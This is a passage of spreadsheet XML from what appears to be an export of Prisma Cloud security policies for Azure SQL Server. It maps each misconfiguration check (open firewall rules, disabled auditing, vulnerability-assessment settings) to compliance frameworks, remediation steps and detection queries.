ISO/IEC 27017:2015, ISO 27002:2022, CSA CCM v3.0.1, ISO/IEC 27002:2013, ISO/IEC 27018:2019, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, FFIEC, NIST SP 800-171 Revision 3, ISO 27002:2022, NIST SP 800-172, NIST SP 800-171 Revision 2, CDC NIST 800-53 Rev4, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ACSC Information Security Manual (ISM), Copy of Azure Security Benchmark (v3), Copy of CIS v1.2.0 (Azure), Secure Controls Framework (SCF) - 2022.2.1, NIST CSF, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v8.2 [Deprecated], FFIEC, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), Azure Security Benchmark (v3), ISO 27001:2013, New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27017:2015, Telecommunications Security Act - TSA, CSA CCM v.4.0.1, CIS v1.2.0 (Azure), ACSC Information Security Manual (ISM), PCI DSS v4.0, MITRE ATT&amp;CK v10.0 [Deprecated], CSA CCM v.4.0.1, NIST CSF, CIS v1.4.0 (Azure), CIS Controls v8, MLPS 2.0 (Level 2), CSA CCM v3.0.1, ISO/IEC 27018:2019, Microsoft Cloud Security Benchmark v1, Azure Security Benchmark (v3), MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS v2.1.0 (Azure) Level 1, ISO 27001:2013, Demo_Daryl ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v6.3 [Deprecated], Matt's ATT&amp;ACK, SOC 2, ISO/IEC 27001:2022, NIST CSF, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO 27001:2013, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, CSA CCM v3.0.1, ISO/IEC 27002:2013, Australian Energy Sector Cyber Security Framework (AESCSF), Copy of Azure Security Benchmark (v3), NIST CSF, Fedramp (Low), HITRUST CSF v9.3 [Deprecated], CSA CCM v.4.0.1, HITRUST CSF v9.3 [Deprecated], NIST CSF, ISO 27002:2022, Copy of CIS Controls v8, Copy of ACSC Information Security Manual (ISM)-clone, NIST CSF, kashan ACSC Information Security Manual (ISM), CIS v1.3.0 (Azure), CSA CCM v.4.0.1, ISO/IEC 27002:2013, CIS v1.5.0 (Azure) - Level 1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, PIPEDA, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, kfirdaus AWS Account-CS, Brazilian Data Protection Law (LGPD), ISO/IEC 27002:2013, TX-RAMP Level 2, CIS Controls v7.1, Sarbanes Oxley Act (SOX), MTSBv2_Azure, ISO/IEC 27001:2022, NIST 800-53 Rev4, NIST CSF, Azure Security Benchmark (v3), NIST 800-53 Rev 5, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], testazure, NIST SP 800-171 Revision 2, ISO/IEC 27018:2019, CIS v1.3.1 (Azure), HITRUST CSF v9.3 [Deprecated], CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2426" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2426" s="2" t="inlineStr"/>
      <c r="D2426" t="inlineStr"/>
      <c r="E2426" t="inlineStr"/>
      <c r="F2426" t="inlineStr"/>
      <c r="G2426" t="b">
        <v>1</v>
      </c>
      <c r="H24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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2426" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2426" t="inlineStr">
        <is>
          <t>Azure SQL Server allow access to any Azure internal resources</t>
        </is>
      </c>
      <c r="L2426" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2426" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2426" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2426" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2426" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2426" t="inlineStr">
        <is>
          <t>6</t>
        </is>
      </c>
      <c r="R2426" t="inlineStr">
        <is>
          <t>6.3</t>
        </is>
      </c>
      <c r="S2426" t="inlineStr"/>
      <c r="T2426" t="b">
        <v>0</v>
      </c>
      <c r="U2426" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2426" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2426" t="inlineStr">
        <is>
          <t>This policy identifies SQL Servers that are configured to allow access to any Azure internal resources. Firewall settings with start IP and end IP both with ‘0.0.0.0’ represents access to all Azure internal network. When this settings is enabled, SQL server will accept connections from all Azure resources including other subscription resources as well. It is recommended to use firewall rules or VNET rules to allow access from specific network ranges or virtual networks.</t>
        </is>
      </c>
      <c r="X2426" t="inlineStr">
        <is>
          <t>1. Log in to Azure Portal
2. Navigate to the 'SQL servers' dashboard
3. Click on the reported SQL server
4. Click on 'Networking' under Security
5. Unselect 'Allow Azure services and resources to access this server' under Exceptions if selected.
6. Remove any firewall rule which allows access to 0.0.0.0 in startIpAddress and endIpAddress if any.
7. Click on 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-2-34
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-networking-policies/bc-azure-2-34</t>
        </is>
      </c>
      <c r="Y2426" t="inlineStr"/>
      <c r="Z2426" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = ['sqlServer'].['properties.publicNetworkAccess'] equal ignore case Enabled and firewallRules[?any(startIpAddress equals "0.0.0.0" and endIpAddress equals "0.0.0.0")] exists
{"category":"Networking","resourceTypes":["azurerm_sql_firewall_rule"]}</t>
        </is>
      </c>
      <c r="AA2426" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2426" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2426" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-107-CKV2_AZURE_34</t>
        </is>
      </c>
      <c r="AD2426" t="b">
        <v>1</v>
      </c>
      <c r="AE2426" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2426" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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6" t="inlineStr">
        <is>
          <t>0faffeb6-dbcd-4715-be6e-f9cadc64cfeb</t>
        </is>
      </c>
      <c r="AI2426" t="inlineStr">
        <is>
          <t>7f47b618-4e96-459e-bfe3-9e6f48fec533</t>
        </is>
      </c>
      <c r="AJ2426" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2426" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2427">
      <c r="A2427" t="inlineStr"/>
      <c r="B2427" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2427" s="2" t="inlineStr"/>
      <c r="D2427" t="inlineStr"/>
      <c r="E2427" t="inlineStr"/>
      <c r="F2427" t="inlineStr"/>
      <c r="G2427" t="b">
        <v>1</v>
      </c>
      <c r="H24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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2427" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2427" t="inlineStr">
        <is>
          <t>Data breach risk due to an Azure SQL Server reachable from untrusted Internet sources and not configured with Active Directory admin authentication</t>
        </is>
      </c>
      <c r="L2427" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2427" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2427" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2427" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2427" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2427" t="inlineStr"/>
      <c r="R2427" t="inlineStr"/>
      <c r="S2427" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2427" t="b">
        <v>0</v>
      </c>
      <c r="U2427" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2427" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2427" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL Servers(PaaS) that are internet reachable from untrust internet source and not configured with Active Directory admin authentication.
Azure Active Directory authentication is a mechanism of connecting to Microsoft Azure SQL Database and SQL Data Warehouse by using identities in Azure Active Directory (Azure AD). With Azure AD authentication, you can centrally manage the identities of database users and other Microsoft services in one central location.
Immediate attention is required to configure Active Directory admin authentication and restrict public exposure reported for the Azure SQL Servers as soon as possible.</t>
        </is>
      </c>
      <c r="X2427" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict access to Azure SQL Server from untrusted internet sources by configuring firewall rules
1. Sign in to the Azure Portal using your Azure account credentials
2. Navigate to the Azure SQL Server Dashboard
3. Identify the reported Azure SQL Server that you want to restrict from untrusted internet sources
4. Navigate to the 'Networking' section
6. Under the 'Firewall rules' section, add the IP addresses from Trusted IP Addresses
7. Click 'Save' to apply the changes
[MISCONFIGURATION]
1. Log in to Azure Portal
2. Navigate SQL servers dashboard
3. Select reported each SQL server
4. Click on Azure Active Directory (under 'Settings')
5. Click on 'Set admin'
6. Select an Azure Active Directory from available options
7. Click on Select
8. Click on Save</t>
        </is>
      </c>
      <c r="Y2427" t="inlineStr"/>
      <c r="Z2427" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-sql-server-list') and finding.name contains all ('Azure SQL Server (PaaS) with network path from the untrust internet source','Azure SQL server not configured with Active Directory admin authentication')</t>
        </is>
      </c>
      <c r="AA2427" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2427" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:32</t>
        </is>
      </c>
      <c r="AC2427" t="inlineStr"/>
      <c r="AD2427" t="b">
        <v>1</v>
      </c>
      <c r="AE2427" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2427" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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7" t="inlineStr">
        <is>
          <t>5a8b2756-ee2d-43a3-a56d-6aa9ca67987e</t>
        </is>
      </c>
      <c r="AI2427" t="inlineStr">
        <is>
          <t>d05465a8-5401-4fe5-a652-0dc82abacbea</t>
        </is>
      </c>
      <c r="AJ2427" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2427" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2428">
      <c r="A2428" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, Azure Security Benchmark (v3), RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, MLPS 2.0 (Level 2), PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, TX-RAMP Level 2, MLPS 2.0 (Level 2), ISO 27002:2022, Secure Controls Framework (SCF) - 2024.2, Azure Security Benchmark (v2), CIS v1.3.1 (Azure), PCI DSS v3.2.1, ISO/IEC 27002:2013, ITSG-33, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, CIS v1.4.0 (Azure), ISO/IEC 27017:2015, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, CIS Controls v7.1, ISO/IEC 27001:2022, CyberSecurity Law of the People's Republic of China, ISO/IEC 27001:2022, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, NIST 800-53 Rev 5, NIST SP 800-172, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, CIS v1.3.0 (Azure), NIST CSF v2.0, NIST 800-53 Rev 5, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, Azure Security Benchmark (v3), HITRUST CSF v.11.2.0, ACSC Information Security Manual (ISM), CyberSecurity Law of the People's Republic of China, Azure Security Benchmark (v3), Brazilian Data Protection Law (LGPD), CIS v2.0.0 (Azure) Level 1, CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, CIS v1.1 (Azure), FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, CIS v2.1.0 (Azure) Level 1, CRI Profile v2.0, PCI DSS v4.0, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CRI Profile v1.2.1, NIST 800-53 Rev4, ISO 27002:2022, APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, SOC 2, HIPAA, PIPEDA, Fedramp (Moderate), NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v4.0, PCI DSS v4.0, CRI Profile v1.2.1, CSA CCM v.4.0.6, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Australian Energy Sector Cyber Security Framework (AESCSF), CIS v1.5.0 (Azure) - Level 1, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, ACSC Information Security Manual (ISM), CIS v1.2.0 (Azure), PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2428" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2428" s="2" t="inlineStr"/>
      <c r="D2428" t="inlineStr"/>
      <c r="E2428" t="inlineStr"/>
      <c r="F2428" t="inlineStr"/>
      <c r="G2428" t="b">
        <v>1</v>
      </c>
      <c r="H24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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2428" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2428" t="inlineStr">
        <is>
          <t>Azure SQL Server auditing is disabled</t>
        </is>
      </c>
      <c r="L2428" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2428" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2428" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2428" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2428" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2428" t="inlineStr">
        <is>
          <t>TA0005</t>
        </is>
      </c>
      <c r="R2428" t="inlineStr">
        <is>
          <t>T1562.008 - Impair Defenses: Disable Cloud Logs (TA0005)</t>
        </is>
      </c>
      <c r="S2428" t="inlineStr">
        <is>
          <t>CIS,Network</t>
        </is>
      </c>
      <c r="T2428" t="b">
        <v>0</v>
      </c>
      <c r="U2428" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2428" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2428" t="inlineStr">
        <is>
          <t>Audit logs can help you find suspicious events, unusual activity, and trends to analyze database events. Auditing the SQL Server, at the server-level, enables you to track all new and existing databases on the server.
This policy identifies SQL servers do not have auditing enabled. As a best practice, enable auditing on each SQL server so that the database are audited, regardless of the database auditing settings.</t>
        </is>
      </c>
      <c r="X2428" t="inlineStr">
        <is>
          <t>1. Log in to the Azure Portal.
2. Select 'SQL servers', and select the SQL server instance you want to modify.
3. Select 'Auditing', and set the status to  'On'.
4. 'Save' your changes.</t>
        </is>
      </c>
      <c r="Y2428" t="inlineStr"/>
      <c r="Z2428" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule =  "$.serverBlobAuditingPolicy.properties.retentionDays does not exist or $.serverBlobAuditingPolicy.properties.state equals Disabled"</t>
        </is>
      </c>
      <c r="AA2428" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2428" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2428" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-331</t>
        </is>
      </c>
      <c r="AD2428" t="b">
        <v>1</v>
      </c>
      <c r="AE2428" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2428" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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8" t="inlineStr">
        <is>
          <t>86eb5c4f-d384-4cb0-b5d8-7dc007bb4804</t>
        </is>
      </c>
      <c r="AI2428" t="inlineStr">
        <is>
          <t>c216cb36-4c13-4171-9ab3-15244f815664</t>
        </is>
      </c>
      <c r="AJ2428" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2428" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2429">
      <c r="A2429" t="inlineStr">
        <is>
          <t>Sarbanes Oxley Act (SOX), ISO/IEC 27017:2015, NIST SP 800-171 Revision 2, MLPS 2.0 (Level 2), ISO/IEC 27002:2013, CIS v1.3.1 (Azure), MLPS 2.0 (Level 2), Microsoft Cloud Security Benchmark v1, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, ISO/IEC 27002:2013, CIS v2.0.0 (Azure) Level 1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, Azure Security Benchmark (v2), ISO/IEC 27001:2022, Azure Security Benchmark (v3), ISO/IEC 27017:2015, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.2.0 (Azure), Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), NIST CSF, CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ITSG-33, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 3, TX-RAMP Level 2, ISO/IEC 27017:2015, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF, CSA CCM v.4.0.1, HIPAA, HITRUST CSF v.11.2.0, ISO/IEC 27002:2013, CIS v1.3.0 (Azure), CIS v1.4.0 (Azure), CSA CCM v.4.0.1, CSA CCM v.4.0.1, ISO/IEC 27002:2013, ISO/IEC 27002:2013, CSA CCM v.4.0.1, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CSA CCM v.4.0.1, ISO/IEC 27017:2015, Secure Controls Framework (SCF) - 2024.2, NIST CSF, NIST CSF, ISO/IEC 27002:2013, TX-RAMP Level 1, HITRUST CSF v.11.2.0, ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, Azure Security Benchmark (v3), ISO/IEC 27002:2013, CSA CCM v4.0.12, ISO/IEC 27002:2013, CIS v1.5.0 (Azure) - Level 1, NIST SP 800-172, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v.4.0.1, ISO/IEC 27018:2019, NIST CSF, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2429" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2429" s="2" t="inlineStr"/>
      <c r="D2429" t="inlineStr"/>
      <c r="E2429" t="inlineStr"/>
      <c r="F2429" t="inlineStr"/>
      <c r="G2429" t="b">
        <v>0</v>
      </c>
      <c r="H24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29" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2429" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2429" t="inlineStr">
        <is>
          <t>Azure SQL Server ADS Vulnerability Assessment 'Also send email notifications to admins and subscription owners' is disabled</t>
        </is>
      </c>
      <c r="L2429" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2429" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2429" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2429" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2429" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2429" t="inlineStr">
        <is>
          <t>A&amp;A</t>
        </is>
      </c>
      <c r="R2429" t="inlineStr">
        <is>
          <t>A&amp;A-03</t>
        </is>
      </c>
      <c r="S2429" t="inlineStr"/>
      <c r="T2429" t="b">
        <v>0</v>
      </c>
      <c r="U2429" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2429" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2429" t="inlineStr">
        <is>
          <t>This policy identifies Azure SQL Server which has ADS Vulnerability Assessment 'Also send email notifications to admins and subscription owners' disabled. This setting enables ADS - VA scan reports being sent to admins and subscription owners. It is recommended to enable 'Also send email notifications to admins and subscription owners' setting, which would help in reducing time required for identifying risks and taking corrective measures.</t>
        </is>
      </c>
      <c r="X2429" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Select 'SQL servers', and select the SQL server you need to modify
3. Click on 'Microsoft Defender for Cloud' under 'Security'
4. Click on '(Configure)' next to 'Microsoft Defender for SQL: Enabled at the server-level'
5. In 'VULNERABILITY ASSESSMENT SETTINGS' section, Ensure 'Also send email notifications to admins and subscription owners' is checked
6. 'Save' your changes</t>
        </is>
      </c>
      <c r="Y2429" t="inlineStr"/>
      <c r="Z2429" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-sql-server-list' AND json.rule = vulnerabilityAssessments[*].properties.storageContainerPath exists and vulnerabilityAssessments[*].properties.recurringScans.emailSubscriptionAdmins is false</t>
        </is>
      </c>
      <c r="AA2429" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2429" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2429" t="inlineStr">
        <is>
          <t>PC-AZR-SQL-658</t>
        </is>
      </c>
      <c r="AD2429" t="b">
        <v>1</v>
      </c>
      <c r="AE2429" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2429" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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29" t="inlineStr">
        <is>
          <t>2d9ff413-f69f-484e-ba55-22ab6333c249</t>
        </is>
      </c>
      <c r="AI2429" t="inlineStr">
        <is>
          <t>c1f4e365-b882-43c5-9c15-f8067d70a1a1</t>
        </is>
      </c>
      <c r="AJ2429" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2429" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2430">
      <c r="A2430" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, CIS v1.2.0 (Azure), MLPS 2.0 (Level 2), ISO/IEC 27002:2013, NIST CSF, MLPS 2.0 (Level 2), Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, Australian Cyber Security Centre (ACSC) Essential Eight - Level 3, MTSBv2_Azure, Microsoft Cloud Security Benchmark v1, ISO/IEC 27017:2015, PCI DSS v3.2.1, CSA CCM v.4.0.1, CSA CCM v.4.0.1, NIST 800-53 Rev 5, HITRUST CSF v.11.2.0, PCI DSS v3.2.1, ISO/IEC 27002:2013, CIS v1.5.0 (Azure) - Level 2, CIS v1.3.0 (Azure), Azure Security Benchmark (v3), ISO/IEC 27017:2015, NYDFS 23 CRR-NY 500.0, CIS v1.5.0 (Azure) - Level 2, ISO/IEC 27017:2015, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, Copy of Azure Security Benchmark (v3), Copy of New Zealand Information Security Manual (NZISM v3.4), Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, NIST CSF, NIST CSF, HITRUST v.9.4.2 [Deprecated], CSA CCM v.4.0.1, ISO/IEC 27017:2015, CSA CCM v.4.0.1, Australian Cyber Security Centre (ACSC) Essential Eight - Level 1, ISO/IEC 27002:2013, Copy of CIS v1.2.0 (Azure), ISO/IEC 27002:2013, Insurance Regulatory And Development Authority Of India, CSA CCM v.4.0.1, CSA CCM v.4.0.1, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, ITSG-33, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, NIST CSF, CSA CCM v.4.0.1, TX-RAMP Level 2, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, New Zealand Information Security Manual (NZISM v3.4), NIST CSF v2.0, NIST CSF, NIST SP 800-171 Revision 2, CSA CCM v.4.0.1, Demo_Daryl ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, CRI Profile v2.0, CSA CCM v.4.0.1, CIS v2.0.0 (Azure) Level 2, ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST CSF v2.0, CSA CCM v.4.0.1, CIS v1.4.0 (Azure), ISO/IEC 27002:2013, NIST SP 800-172, CSA CCM v.4.0.1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2024.2, NIST CSF, NIST CSF, NIST CSF, TX-RAMP Level 1, Azure Security Benchmark (v3), ISO/IEC 27002:2013, NIST CSF, Australian Cyber Security Centre (ACSC) Essential Eight - Level 2, CIS v1.3.1 (Azure), Azure Security Benchmark (v2), Sarbanes Oxley Act (SOX), CSA CCM v.4.0.1, ISO/IEC 27018:2019, CSA CCM v.4.0.1, ISO/IEC 27018:2019, DORA, Secure Controls Framework (SCF) - 2024.2, CSA CCM v.4.0.1</t>
        </is>
      </c>
      <c r="B2430" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2430" s="2" t="inlineStr"/>
      <c r="D2430" t="inlineStr"/>
      <c r="E2430" t="inlineStr"/>
      <c r="F2430" t="inlineStr"/>
      <c r="G2430" t="b">
        <v>1</v>
      </c>
      <c r="H24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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2430" t="inlineStr">
        <is>
          <t>azure-sql-server</t>
        </is>
      </c>
      <c r="K2430" t="inlineStr">
        <is>
          <t>Azure SQL Server ADS Vulnerability Assessment is disabled</t>
        </is>
      </c>
      <c r="L2430" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2430" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2430" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2430" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2430" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2430" t="inlineStr">
        <is>
          <t>Guidelines for System Management</t>
        </is>
      </c>
      <c r="R2430" t="inlineStr">
        <is>
          <t>ISM-1693</t>
        </is>
      </c>
      <c r="S2430" t="inlineStr"/>
      <c r="T2430" t="b">
        <v>0</v>
      </c>
      <c r="U2430" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2430" t="inlineStr">
        <is>
          <t>azure-sql-server-list</t>
        </is>
      </c>
      <c r="W2430" t="inlineStr">
        <is>
